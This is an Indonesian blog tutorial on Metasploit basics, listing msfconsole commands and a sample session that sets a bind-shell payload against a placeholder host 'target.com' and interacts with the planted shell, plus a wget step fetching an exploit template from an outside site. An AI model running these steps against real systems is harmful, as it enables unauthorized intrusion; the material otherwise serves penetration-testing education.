Dasar Metasploit

Simpan Postingan

Dasar Metasploit

Assalamu'alaikum . ^_^

Sebelum nya ini tulisan sudah 2 bulan yang lalu karena Data udah ilang bersama FD ilang dan data hilang bersama instal ulang komputer karena data tidak di back up :(

Saya menulis ini kembali ya walaupun mungkin dengan tulisan 2 bulan yang lalu .

Di sini / dalam tulisan ini saya menjelaskan tentang dasar metasploit , di sini saya menjelaskan hanya dasar karena saya juga masih belajar ^_^

Langsung saja ya karena mungkin teman-teman sudah tahu apa itu metasploit . ^_^

Untuk menjalankan metasploit pertama kali nya ada beberapa set up yang harus dilakukan untuk melakukan eksploitasi atau yang biasa di sebut penetrasi kalau g' salah ^_^

Hal pertama yang harus di lakukan membuat direktori dalam melakukan eksploitasi tersebut,perintah direktori tersebut bisa sebagai berikut ^_^

mkdir -p ~/.msf3/modules/exploits/

Di sini saya menyediakan contoh untuk melakukan sebuah eksploitasi, yang di gunakan sebagai template untuk mengeksploitasi nya .

Comand yang di gunakan untuk mendownload nya bisa sebagai berikut ,

cd ~/.msf3/modules/exploits/ wget http://wemetlastnite.com/pics/xmple.rb 

Wget di sini adalah di rektori di mana file tersebut di simpan , yuk lanjut lagi ^_^

Yupz setelah perintah di atas selesai sekarang metasploit siap di gunakan untuk melakukan eksploit nya . sikak coyyyyyyy

Setelah semua sudah siap untuk memulai konsole, cukup menjalankan msfconsole.

Nah sebelum melakukan sebuah eksploitasi di bawah ini adalah comand / perintah yang sering di gunakan Metasploit ^_^ :

1. use exploitname

Nama exploit yang di gunakan dalam exploit metasploit tersebut.

2. set RHOST hostname_or_ip

Untuk mengetahui atau menginstuksikan target lewat remote host atau Ip target ^_^ .

3. set RPORT host_port

Untuk mengatur port yang terhubung lewat temote host ke target tersebut.

4. set PAYLOAD linux/x86/shell_bind_tcp

Mengatur payload yang di gunakan lewat platform Linux x86 ke sebuah target ketika shell sudah terpasang.

5. set LPORT local_port

Menetapkan port di server yang akan di xploit atau target ^_^ .

6. exploit / rexploit

Memanfaatkan kode dari web yang telah di eksekusi , Yupz reload exploit / rexploit memungkinkan perubahan kecil tanpa harus retart konsole tersebut.

7. sessions

Ini untuk membantu agar kita bisa berinteraksi dengan berbagai remote shell yang sudah kita tanam di target / server.

8. show options

Untuk mengatur exploit dan payload , show exploits dan show payloads juga dapat menampilkan exploit / payload yang telah di eksekusi.

9. help

Akan memberikan informasi tentang perintah-perintah yang tidak di sebutkan di atas . ^_^

Di bawah ini saya akan memberikan contoh exploit attack target.com menggunakan port 3000 dengan shell_bind_tcp payload.

Bila berhasil maka akan membuka port 9485 dan metasploit akan menunjukk shell di dalam web target yang telah di exploit ^_^ .

use example

set RHOST target.com

set RPORT 3000

set PAYLOAD linux/x86/shell_bind_tcp

set LPORT 9485

exploit

Nah kalau pada metasploit 3.1, dua perintah berikut akan memungkinkan kita untuk bermain / berinteraksi dengan shell yang sudah tertanam.

sessions -l

sessions -i 1

Sekian Penjelasan dari dasar metasploit , 

Thanks :

Exploitations

September 23, 2015 • 0 komentar

Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.